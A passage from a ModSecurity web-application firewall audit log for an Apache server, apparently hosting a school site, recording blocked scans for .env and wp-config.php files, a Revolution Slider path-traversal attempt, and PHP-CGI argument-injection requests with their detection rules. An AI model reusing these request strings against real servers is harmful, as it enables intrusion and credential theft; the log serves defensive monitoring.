Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ebecc81e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebecc81e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745891776631093 763 (- - -) Stopwatch2: 1745891776631093 763; combined=332, p1=300, p2=0, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebecc81e-Z-- --2756641b-A-- [29/Apr/2025:09:14:17 +0700] aBA1-cDCAfZpkPvVAPOxIAAAAJc 103.236.140.4 39374 103.236.140.4 8181 --2756641b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 Accept-Charset: utf-8 --2756641b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2756641b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745892857714024 797 (- - -) Stopwatch2: 1745892857714024 797; combined=377, p1=340, p2=0, p3=0, p4=0, p5=36, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2756641b-Z-- --a6b78169-A-- [29/Apr/2025:09:40:03 +0700] aBA8A1aiXvaz3oCHN0iuAAAAAMM 103.236.140.4 45628 103.236.140.4 8181 --a6b78169-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A5000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --a6b78169-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6b78169-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745894403418300 953 (- - -) Stopwatch2: 1745894403418300 953; combined=404, p1=349, p2=0, p3=0, p4=0, p5=55, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6b78169-Z-- --24c4103f-A-- [29/Apr/2025:10:00:06 +0700] aBBAtgW3ctMdWeqW3LO2SAAAAFQ 103.236.140.4 50350 103.236.140.4 8181 --24c4103f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 183.220.231.212 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 183.220.231.212 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --24c4103f-C-- --24c4103f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24c4103f-E-- --24c4103f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745895606674194 17511 (- - -) Stopwatch2: 1745895606674194 17511; combined=27944, p1=546, p2=2585, p3=0, p4=0, p5=12426, sr=130, sw=0, l=0, gc=12387 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24c4103f-Z-- --b060e937-A-- [29/Apr/2025:10:28:24 +0700] aBBHWKmWspnM_fF1r_6BKAAAAAg 103.236.140.4 57040 103.236.140.4 8181 --b060e937-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.215.76.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.215.76.183 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b060e937-C-- --b060e937-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b060e937-E-- --b060e937-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745897304154375 4549 (- - -) Stopwatch2: 1745897304154375 4549; combined=3167, p1=481, p2=2650, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b060e937-Z-- --e4eeeb78-A-- [29/Apr/2025:10:33:55 +0700] aBBIo8DCAfZpkPvVAPO12gAAAJQ 103.236.140.4 58412 103.236.140.4 8181 --e4eeeb78-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --e4eeeb78-C-- --e4eeeb78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4eeeb78-E-- --e4eeeb78-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745897635978294 4137 (- - -) Stopwatch2: 1745897635978294 4137; combined=2819, p1=472, p2=2317, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4eeeb78-Z-- --fd72db24-A-- [29/Apr/2025:14:14:30 +0700] aBB8VgW3ctMdWeqW3LPCMwAAAEM 103.236.140.4 54198 103.236.140.4 8181 --fd72db24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 Accept-Charset: utf-8 --fd72db24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd72db24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745910870185125 797 (- - -) Stopwatch2: 1745910870185125 797; combined=368, p1=336, p2=0, p3=0, p4=0, p5=32, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd72db24-Z-- --a0094867-A-- [29/Apr/2025:14:47:38 +0700] aBCEGqmWspnM_fF1r_6W7QAAABM 103.236.140.4 34038 103.236.140.4 8181 --a0094867-B-- GET /wp-config.phpold HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 82.165.86.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.165.86.35 X-Forwarded-Proto: http Connection: close Accept: */* --a0094867-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0094867-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745912858028460 846 (- - -) Stopwatch2: 1745912858028460 846; combined=336, p1=288, p2=0, p3=0, p4=0, p5=48, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0094867-Z-- --c5925c00-A-- [29/Apr/2025:14:47:39 +0700] aBCEG8DCAfZpkPvVAPPDuQAAAJE 103.236.140.4 34044 103.236.140.4 8181 --c5925c00-B-- GET /wp-config.php1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 74.208.59.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.208.59.85 X-Forwarded-Proto: http Connection: close Accept: */* --c5925c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5925c00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745912859212386 788 (- - -) Stopwatch2: 1745912859212386 788; combined=280, p1=241, p2=0, p3=0, p4=0, p5=38, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5925c00-Z-- --4b2e8379-A-- [29/Apr/2025:15:38:09 +0700] aBCP8VaiXvaz3oCHN0jBZgAAAMQ 103.236.140.4 45810 103.236.140.4 8181 --4b2e8379-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; Le X620 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 Accept-Charset: utf-8 --4b2e8379-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b2e8379-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745915889738823 774 (- - -) Stopwatch2: 1745915889738823 774; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b2e8379-Z-- --052dc72d-A-- [29/Apr/2025:16:21:39 +0700] aBCaI8DCAfZpkPvVAPPRwwAAAIE 103.236.140.4 43532 103.236.140.4 8181 --052dc72d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.106.105 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.106.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --052dc72d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --052dc72d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745918499063557 816 (- - -) Stopwatch2: 1745918499063557 816; combined=384, p1=346, p2=0, p3=0, p4=0, p5=38, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --052dc72d-Z-- --5880d241-A-- [29/Apr/2025:17:09:27 +0700] aBClV511ysLXBHLtLPV_zAAAAEI 103.236.140.4 42008 103.236.140.4 8181 --5880d241-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept-Charset: utf-8 --5880d241-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5880d241-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745921367769504 870 (- - -) Stopwatch2: 1745921367769504 870; combined=332, p1=297, p2=0, p3=0, p4=0, p5=35, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5880d241-Z-- --6c00622c-A-- [29/Apr/2025:18:01:21 +0700] aBCxgRmWB8ZGI9fN-VFUHgAAAI4 103.236.140.4 34518 103.236.140.4 8181 --6c00622c-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --6c00622c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c00622c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924481372882 1113 (- - -) Stopwatch2: 1745924481372882 1113; combined=392, p1=348, p2=0, p3=0, p4=0, p5=43, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c00622c-Z-- --c318f211-A-- [29/Apr/2025:18:01:22 +0700] aBCxgp11ysLXBHLtLPWdRQAAAFA 103.236.140.4 34520 103.236.140.4 8181 --c318f211-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c318f211-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c318f211-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924482134512 761 (- - -) Stopwatch2: 1745924482134512 761; combined=263, p1=229, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c318f211-Z-- --40f1780f-A-- [29/Apr/2025:18:01:22 +0700] aBCxghmWB8ZGI9fN-VFUHwAAAI8 103.236.140.4 34526 103.236.140.4 8181 --40f1780f-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --40f1780f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40f1780f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924482494872 727 (- - -) Stopwatch2: 1745924482494872 727; combined=267, p1=231, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40f1780f-Z-- --76b9624d-A-- [29/Apr/2025:18:01:22 +0700] aBCxgrM38gUEppT2vWM7ZgAAAMk 103.236.140.4 34528 103.236.140.4 8181 --76b9624d-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --76b9624d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76b9624d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924482850568 761 (- - -) Stopwatch2: 1745924482850568 761; combined=259, p1=226, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76b9624d-Z-- --4498cc47-A-- [29/Apr/2025:18:01:23 +0700] aBCxgyUYsqS7mE9-0zokGwAAAA4 103.236.140.4 34534 103.236.140.4 8181 --4498cc47-B-- GET /test/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --4498cc47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4498cc47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924483530510 921 (- - -) Stopwatch2: 1745924483530510 921; combined=325, p1=293, p2=0, p3=0, p4=0, p5=32, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4498cc47-Z-- --2f26d507-A-- [29/Apr/2025:18:01:24 +0700] aBCxhCUYsqS7mE9-0zokHAAAAAk 103.236.140.4 34536 103.236.140.4 8181 --2f26d507-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2f26d507-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f26d507-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924484363509 719 (- - -) Stopwatch2: 1745924484363509 719; combined=300, p1=268, p2=0, p3=0, p4=0, p5=32, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips 